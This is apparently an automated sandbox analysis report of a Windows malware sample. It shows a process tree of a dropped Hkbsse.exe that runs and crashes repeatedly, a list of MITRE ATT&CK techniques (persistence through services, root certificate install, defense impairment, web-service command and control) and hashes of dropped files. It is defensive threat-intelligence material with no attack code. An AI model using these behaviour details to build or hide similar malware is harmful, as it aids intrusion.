C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2460 -ip 2460
1⤵
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5968 -ip 5968
1⤵
PID:680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5968 -ip 5968
1⤵
PID:4912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5968 -ip 5968
1⤵
PID:5948

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:5672
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 452
  2⤵
  - Program crash
  PID:4344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5672 -ip 5672
1⤵
PID:5024

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:5736
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 444
  2⤵
  - Program crash
  PID:1196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5736 -ip 5736
1⤵
PID:3048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5968 -ip 5968
1⤵
PID:1240

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:5572
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 444
  2⤵
  - Program crash
  PID:1460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5572 -ip 5572
1⤵
PID:5912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5968 -ip 5968
1⤵
PID:888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 5968 -ip 5968
1⤵
PID:2064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5968 -ip 5968
1⤵
PID:5940

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:3924
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 448
  2⤵
  PID:5108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3924 -ip 3924
1⤵
PID:1072

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:2844
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 444
  2⤵
  PID:3688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 2844 -ip 2844
1⤵
PID:468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5968 -ip 5968
1⤵
PID:5504

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:5216
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 440
  2⤵
  PID:2180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5216 -ip 5216
1⤵
PID:5192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5968 -ip 5968
1⤵
PID:4616

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:3416
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 444
  2⤵
  PID:2584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5968 -ip 5968
1⤵
PID:3668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5968 -ip 5968
1⤵
PID:3392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3416 -ip 3416
1⤵
PID:6040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
418B

MD5
99e581b10fbd924db4fb93d5ad214a7f

SHA1
21d239d1c9f7fe9a7ae5e360ba7fc7490a17820f

SHA256
dca67506d06f3c9a59ae2b5533975328d3306c72b36f2119725a3d064205e283

SHA512
834deae5044b470ae5b4f78b75fac889df6b9148ea786c8149d39b49e47bdc13f99578ec515f3f0654888575be795c605fd22f4c9a0d43029e34c6a937d9083e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
150B

MD5
b39289a26769e993e047e4a20b25a585

SHA1
5a88a9e540e69bd4094aaa0ff041ab3d5c9bf50f

SHA256
6129d92b96bebc58dc355f16429539bf5da79cdb6ca22b6c00af4fe2bd33fee5

SHA512
cf32061e272b59ff895a1fc584369bc55ec79d71b02071c37b7c91cb47504071d69c8ee7523c23fc6800c168aa529506b0a92a3c142f18fdd6b7ce381c5901b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
284B

MD5
ccfeb43fbc39ad618817d427c7f4db8b

SHA1
b203381f6bd0665ba2c8d276077ceafe9357a083

SHA256
1c954cafc6d2c16785b912fc8355d6d69d7f668fbcadb80c7076cc1351adef35

SHA512
a95e90051ac7f962e1b5b72964703f00eb1050f014cb45ab8860834335f112dea046b76cd8f933165a8e466b21a208ae63f0dc2d4a9c83d4145ee7c0fa81c7fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\4309211d-1706-4f11-aedd-62e7a71777c1.dmp

Filesize
11.2MB

MD5
cdbf2c1e8bae708724d51f1a84565094

SHA1
0c67e36e6d7e35f63d6d3e8ecc7d1810d6878488

SHA256
e1e05d1f25bf1868aa04f45cc2290dc8c0ea99e1daca62ab4f804666ec4247e1

SHA512
f303ee32f8ff19c30058838ac99ba014ba0aa30925ff4f8ba3453dc80bac3a20ef91fb302cb43c7dc568d78e903144baac7cee76e9bb3fc0b46b6ebf89c1a5b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\5f3c422f-c05c-41aa-8ffb-9f0ffe29fd94.dmp

Filesize
3.4MB

MD5
da54f6d0928d617944fdeae83f1792d9

SHA1
0d9f85030824bb04f93caef6d6b6fe0e3091ea3d

SHA256
92f3cd1e98de70afe7609bb99bdf4190be2dc90201800d5106ab2e4d71048f27

SHA512
e080c28285be3831fc512ad36eaf499172f3092c2d7463572651c00bb01cd4aad6d426ee1cd3356e892915f377e9d37711508186cc98c84299227b6854077891

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\c7a79189-4d50-4093-b462-6f4e6d062bd5.dmp

Filesize
369KB

MD5
f61368b78d019af9dce59f969c4e7423

SHA1
4ba147da4698db871f543cd571d75f49dabccf73

SHA256
cef5bf922627d12864ea667656f8b05ff6b9464c78f088b8305e86cfffc16806

SHA512
0dd556a87a1ee28161f6889b1d83bdd3b317cfdb7f09564280728b7fd12560bb1ee1824818b2f8153c054e1faaa014e8e6f29429aa7d89b4f755b7e91c9218ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
210676dde5c0bd984dc057e2333e1075

SHA1
2d2f8c14ee48a2580f852db7ac605f81b5b1399a

SHA256
2a89d71b4ddd34734b16d91ebd8ea68b760f321baccdd4963f91b8d3507a3fb5

SHA512
aeb81804cac5b17a5d1e55327f62df7645e9bbbfa8cad1401e7382628341a939b7aedc749b2412c06174a9e3fcdd5248d6df9b5d3f56c53232d17e59277ab017

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f4e6521c03f1bc16d91d99c059cc5424

SHA1
043665051c486192a6eefe6d0632cf34ae8e89ad

SHA256
7759c346539367b2f80e78abca170f09731caa169e3462f11eda84c3f1ca63d1

SHA512
0bb4f628da6d715910161439685052409be54435e192cb4105191472bb14a33724592df24686d1655e9ba9572bd3dff8f46e211c0310e16bfe2ac949c49fbc5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2411f7ebef3ec400370fe8d40262c279

SHA1
ad4ca9b839eb9c2a6aa69402de7452863399c471

SHA256
370ea8f8f8912ead1e4a0470a4289188b59f7813d7a948ccb2aba1e0cc785a47

SHA512
fb32a3a937c224a4aba70d45376d92c2f311172f52719e25315e4207d11580af75ecba2314c0329aad60c974e3a9c8bee29052701173a57e312fc9383db779d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
62KB

MD5
c3c0eb5e044497577bec91b5970f6d30

SHA1
d833f81cf21f68d43ba64a6c28892945adc317a6

SHA256
eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb

SHA512
83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
69KB

MD5
7d5e1b1b9e9321b9e89504f2c2153b10

SHA1
37847cc4c1d46d16265e0e4659e6b5611d62b935

SHA256
adbd44258f3952a53d9c99303e034d87c5c4f66c5c431910b1823bb3dd0326af

SHA512
6f3dc2c523127a58def4364a56c3daa0b2d532891d06f6432ad89b740ee87eacacfcea6fa62a6785e6b9844d404baee4ea4a73606841769ab2dfc5f0efe40989

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
41KB

MD5
3358e831188c51a7d8c6be54efafc248

SHA1
4b909f88f7b6d0a633824e354185748474a902a5

SHA256
c4cd0c2e26c152032764362954c276c86bd51e525a742d1f86b3e4f860f360ff

SHA512
c96a6aae518d99be0c184c70be83a6a21fca3dab82f028567b224d7ac547c5ef40f0553d56f006b53168f9bba1637fdec8cf79175fd03c9c954a16c62a9c935e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
19KB

MD5
76a3f1e9a452564e0f8dce6c0ee111e8

SHA1
11c3d925cbc1a52d53584fd8606f8f713aa59114

SHA256
381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c

SHA512
a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
88KB

MD5
b38fbbd0b5c8e8b4452b33d6f85df7dc

SHA1
386ba241790252df01a6a028b3238de2f995a559

SHA256
b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

SHA512
546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
1.2MB

MD5
b55b8baf9ced2da93c17f6b749734870

SHA1
b7a0adbe14b12fd8f7bc3fbc27a5611693057cec

SHA256
38f98d8fffec9928c61be37a6d4a3da72e027dfc239b53d784964cc922a201a4

SHA512
69c98fb523179d002566ec88bfcd12800ec0154ef76efc017d05c1dc5f2ea479e5ced0e9c6158a2e8546f88fe19d58a3627bbea546e4ab6905f4f340767fffe8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

Filesize
21KB

MD5
75639d3d77cb22ef3e549631f93fc12d

SHA1
f6235da6e0fcef5c5aee1c87d0646febc5759c33

SHA256
52e768a684b5975234fb28f3e902f27b929694beeb5be7e06ed98dcd599086ea

SHA512
02f43e4fe949535b41d74299b8a3eed3e244adc4fb38a119d08108339811fe97f399e3f8703ffe87bfd6a4461dfc2f6a5c4b342ed35c1b5256c9633c9d8ea898

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
0c195125d42da96e0220d3e501a3fc98

SHA1
aed794f8b3c251cce28edb6d67067bec3a52c75f

SHA256
934c602361397b150d14392436318c8b0f18d0ffcd96ef3e91b6bf13b7fc8630

SHA512
67ce338a6ef2cc421bcafab87fa25cf3461f58a2fdcac353e8a6baaa7784b61e0fd63845f83c45b0022c9be48c8ee3a116f4a125b3ecbddde17fe406a701b9bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
2e7999cb5d5819a36ef6323579d130d3

SHA1
9fdaccc93a886581cf97dd40b997c215863e4663

SHA256
f26d561f73626d05a1ac5b2b3c864626c038e9819fe86671f24e4e802e6ac390

SHA512
3f2ec5b7b41b0f62d91f3a41bbc933b9c7f448825c2117560f15055ef7080d56db0a264f677075059a2921a1f232ba1507d0fc166e3e0fd18da51de832a3c3d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
383ed11dc7e4405c6adef2fe9211f71a

SHA1
de385927bea4bbf3179c915b19949b5f9dfe5509

SHA256
7e860b3ff42e72e61cfd12778c580222d8c863ddd9be313913a76fdd7155e90a

SHA512
784b50e82e6694f207649e93c6c1afec05b5f3ef599b9883b993e16c6e72a1eec8c44b821447e5d223c76b295d38de18ca3ea8c8e12596b2c298ef049f76a7ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
dd9426ed066f87a300dc2d432f1d5776

SHA1
ea71451c96e2cb5b3324d59d5010feeb2c8e8bb6

SHA256
90c9315405c94cfad63f5550a4bd92844b7f916f70694ba5333986c12c21106b

SHA512
231ca67316e64ed1a9d98a187b25f6d4c2220a9914ddbbd95ac2e6ab875e3274fd7a1998d4603cfe2855c6258886bcedba71eef9f95372ff0de5f2cca06388a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
2295a7f8d405f06439dd74ac6cbdb9a8

SHA1
335a13a7b8d1cc3eb5ec867bcbf1fbd96e42fe2f

SHA256
1a9e0af3c899503a95e68422b30a7a0ad27fd581639c397b206edee48b9c5748

SHA512
9f30b8f79aec78454be686f5de50d600677b3ac3e88f4e3fd1beef287236dc31cf3b7e5532780d44c550bf43fc0e25b0713663ef8a4243c04a08b9c7b173f3ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
20b9cc33de55a2bdcc67b188d2513fea

SHA1
0bc3d1b5ecf60e984179145509d94bcf8ee00fe0

SHA256
bbd21f08f62edb69245d5f76d3d20b183e5747a66f83ca0f87e0b30c28aeaff1

SHA512
fe4b2a73774bbc71e23357f82a5f8bf7da32e81444a7d396c15a7dcde8d0789677644beca99b897e4ec3e66baf45215705e55e71c9952e93e5a0b4eba374aebc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
e056d119e6b9dae7470089c3479449f2

SHA1
6e6484447734566a680e2a113e356ac29e4e0f17

SHA256
fdecb6f7cc7197f58c5287668910b51b386fd13a9c352cb7586aa9b529734885

SHA512
4be746d9319a553f577a116b0e426f25eb46a804717d2b434c4044ed47a35377122071f825219eaf0497a22c93485f46bbad88107afcf7019bd05feac7ca4920

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
3c913961ab528169ce06da087ac4af09

SHA1
41424552021eab85408996badb854ea40e6e5689

SHA256
0c57babd8530bccf856bb94a63c3886a112f53c86d1e3cc5ea6256602d17145e

SHA512
2c68ffc3f9eefbf069890a368095d2cc295227fc198080f8e1eac0205bf3c4afb4896c4b13428f948261dd548f462b4895063b9a99f1737080c788312c1dca3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
00eb1c3907632c285068ea17f8bcb0cf

SHA1
279b6fd7e4841c8c1c179b0e846abfa2ee408761

SHA256
59ca1f6752e3664776b02cbf2f3141419cc36d9add3194335e24c83f94fd8130

SHA512
c6872c64742ee6cf47c8d03befe4340c3dcfa06ed21261f81695545544ff8cb858f93a2be2475964912be01bf330c9ba255a27aa43a4871e06746a5201c43190

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
ad76e33412223d4589870162181a75b8

SHA1
ce61f9d5c59d995480a8acc37a0f6f95b1ee4e14

SHA256
8da928523b659dc07f355c1bb4b9a87702dc89f2f39ce978469b99e4ded35975

SHA512
5a9bae488827104e129bc7c224b0ae3d074bb8367c2f2fba266c051386d94a85776e7cf7958d6d585635a0a0a5391e00644c7a8e2117ca9d2e46c5410ec6c08c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
23d24d8632afafcb807a112f8730d84f

SHA1
fb52d69b381c480dd057bffa346284df6d4fba36

SHA256
7781acd0afe70fb7c60df81e8a143307cd935c46b204f32e0012cfba1455ade2

SHA512
c40d00dfec7b8a876ac481f51b7514e91e89e68f0e5a942aa7ec9e7bca62824f9c68f0c14bb98bbac0c9e4e52e01412a2df2666bc521130457176cec7ecb8c34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
89633866d0411b4b14928375cd89ffbb

SHA1
85e9c161a2def84ea873f371b0cdfcdbd3ee293b

SHA256
b40d8d708d6035c7c2aabeea6cafef50919c086912d1794eb39f6262708c5fc4

SHA512
4f7163d470b1f3c95a0a81b0a58052ee3a18700d846502ba041e6556fb51bd332cdfabbd40a3cc65cb25b72cf34776f69eaf339f98f3be27401d945d596f9ee4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
1ac4d4623caf669c58319dffe34feeb7

SHA1
dc575b213fd454fa5e4619a734ddd7489516ff9c

SHA256
b19b0d26350f149d236694f8f690d75b2bebca8a276d314911eed9bf6b5d00ef

SHA512
13e7f78b3ed5229fcfa9deeec8e6beff5423f7bb5cf5c96671a113700018929a9591c03fe6eb2c886107bcea5f78eff3ae116a70d7d74ead1568ba467bfb9aa0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
0d43c8bab3c65fa4a0bac46410dcd955

SHA1
66e31e3d654bfac2b75b73ae15d9c30c102217f6

SHA256
b10c29592cdaa083e0f6633cd372e694d5417afe4e475cea86ba68b92d278538

SHA512
cdc4b8d0c2869dda29fa39d7a817235f7feafa64d036b298e4465317e712a2557a68038dc2f06c65952f7bda4986e42734f99f0c3fec4eea1720c72ddff105ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
de16ed47a00914e7839b1371208b2fef

SHA1
d302ce259ae0bd4e4dd4a00013462d2b5d6f4f42

SHA256
aa6c51fed14a2b9a9fe3f6e4ac7e2e771962a75ad52a3e1f10f5cb9d67c3c61c

SHA512
b33e879f665077ef1a6397c5b30e2ee2292285f3fcf5a236ca6252eb7a79cc80c4c90bdf54e71eff5fe6cdbd8a6222263c8a74996940e95f7d3471ddd649e6b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
2125245c1ac536c34de935a634906c05

SHA1
047d681a481c6b67f4bd67e1bc202889dfa0bb78

SHA256
2746d94f6e1c66ae76048276bd2a025533696171a2c3fa2e64e14ad684a47a53

SHA512
f7c51a4a4375a68240ef13d4f30674b338ab862760034e129bef79f35bf8f2dcb184c79074eb67c26e1b5f459fadeafe3d0cc7a1ee9a302b90c2ea47d0d7437a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1079499b9cfe7bd8274a93e527ec15d6

SHA1
48ba995abfeb46fa2acb606785f1cc46c335c71e

SHA256
c4a9e36b66e6e15f03a87d3d45174cfa8b8268bee26a2ec06338ad2b04323403

SHA512
b12f54dd854692c387deb091c519e16902203ddfd70bf27abd7601afe6e811964da89b50681f0090f07dc3be49f845d1f2b94a1d6142215ded9e6fe05cfa04ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
4d2a01c3979a61ed318de8ff54fabdda

SHA1
cbff49e754ca6fb65e21ac524ce21cc8d2285f91

SHA256
b7006a88fe6a5ddb00d0fdfdaf06d8653b16276db905ab25d78a7f8b8ad4e14e

SHA512
cb3f20e97097c351d2f91b8e6b551e3e5b0bd16bb4c89273cb56b7dd6d0b5bf5b44cb6ecc8048da81ca6161090976342f8357fe51c3db8ef506079188aceaf60

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
54e5d08d27ca34faf63be51890a2ebed

SHA1
7020ffe7c68d0f8b62738f90161625b699045499

SHA256
868a4bbce8bec363dfc05e393acfcac556dd94eef03ff0654c59ccb2f53a0516

SHA512
c9aa85784e05a86bb1d2d445e258f6f2a9b142cc4fa26b5a3df0b492e3640134327eb8b1c2a9bc56a1a5c245de1f0123d12a31617b001ed9e2aab600fae51b9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58f0d3.TMP

Filesize
1KB

MD5
f2802e1645409680f75621c0b450da4a

SHA1
3af8e5c0f4d251f7b2d2b070b4bfb17ea5ca9222

SHA256
1ef6f4bbf512a742aa6540c3f0567479d179103fbdec5ae5d2fef78f211d708c

SHA512
0cc80a6c4b61ca203d0468668add215e25240e1383d5a0059bef566da429072ab9708a43de54160c5db2382577393d5482fbb09f388921a328a8edb5503e1e2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000006

Filesize
17KB

MD5
fc97b88a7ce0b008366cd0260b0321dc

SHA1
4eae02aecb04fa15f0bb62036151fa016e64f7a9

SHA256
6388415a307a208b0a43b817ccd9e5fcdda9b6939ecd20ef4c0eda1aa3a0e49e

SHA512
889a0db0eb5ad4de4279b620783964bfda8edc6b137059d1ec1da9282716fe930f8c4ebfadea7cd5247a997f8d4d2990f7b972a17106de491365e3c2d2138175

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
442f9c3780c366a1205883de818e63e0

SHA1
a5f012980ef5327f85a23fb02c35bde78691505b

SHA256
45d4f44ecf04ffdb0cc1deb37d81391edbdda4cf09ef468cfff4cf1a46cfb52a

SHA512
0b433a450dd569babe4c5be0de551a3a2adc8498b289a2daab00ae684b2c8b726b7511f766bc9f6d37e997139f8b7bd10ef763ecf77f4eb444eb9e892ef0cf71

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
49fe87915e9b95dce6904ea0c528f351

SHA1
733ca7ae3993dc52adfd6db0933369cac929e2e4

SHA256
4ae3a5b463bcab91c35569c690f2db73c8786ec6138ff26909aa973eeb3bcf6d

SHA512
036cd59a517f3abdf22d694c748b3b7bf1568b2c5404a618a9b0e02df1e76fe800c32e0a52e754b4dfb34e94fb645fd48acd1c8a633a3f593e86fc558ed06bb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000005011\1052d4325d.dll

Filesize
2.8MB

MD5
4d9670c96d85e7c5dc2efbf0b4d4ebd5

SHA1
10adcde8a6b920a5cde93cc515640fa268be1a9e

SHA256
a658987b7d77253b8aa4bf639ad27b9e1fb4e33b516dcb2f09d15d489d70f6b7

SHA512
8937b3686cbf0112eb7aae37790de611c2f045d9e5c81b21217bd80444123ab5aeef22a35c1451f3c7d1acead4810675361fd7d155d825240166752c42be29fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\403246978718

Filesize
48KB

MD5
5a63a4daff321d39f2cead4787a6e074

SHA1
3d97edd2bc040e3db3ff4c3304dfa88df6df7fe6

SHA256
9b5d5afc96da70cfcab41a84e2162d529e86a123cddc1f4fb81d2f45cf4ce8ec

SHA512
004a16494951eff934ec74cc739969a192bbb48f8beb7c30b78f8590c2062369f3edcd8e9c0cea606a6724d52499af5ade171f8ce32ede011019f854a3198f56

Download Submit
C:\Users\Admin\AppData\Local\Temp\403246978718

Filesize
47KB

MD5
a911365f8b9148bc9577854a96a90903

SHA1
8a8555feecbcb51cd0a18a4748b475941bf51081

SHA256
6d5c800ec629f76c21c91a1d9cf13a83cd24a41182752f11be976f00cd8e5967

SHA512
0ce45dd0f51052a1ae394157f0f215f8fe92f90eddc3386ae02a40f0bae5377be82c75357ac20b7c23452b657f2459dc216ee51c4cf575c6092a7aa7da21eaba

Download Submit
C:\Users\Admin\AppData\Local\Temp\403246978718

Filesize
89KB

MD5
2daa3f101143f15d75c7704757afc3bc

SHA1
a556d53efb04d75902ca798823fc44dd83192da3

SHA256
523c547ddc2a7207c897b19c21e350692ce384df83b2529686f3da91bfe56227

SHA512
64a989a85514b48292c64bbb2c7d1fe4185d8fb12265d6eb033c3ab724f1eedb0d0958a5d88c4a8c4f4fa8110faeb0a155a2a2174e38105c3d71da969dd55c0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wigdzwpf.vgt.ps1

Filesize
60B

MD5
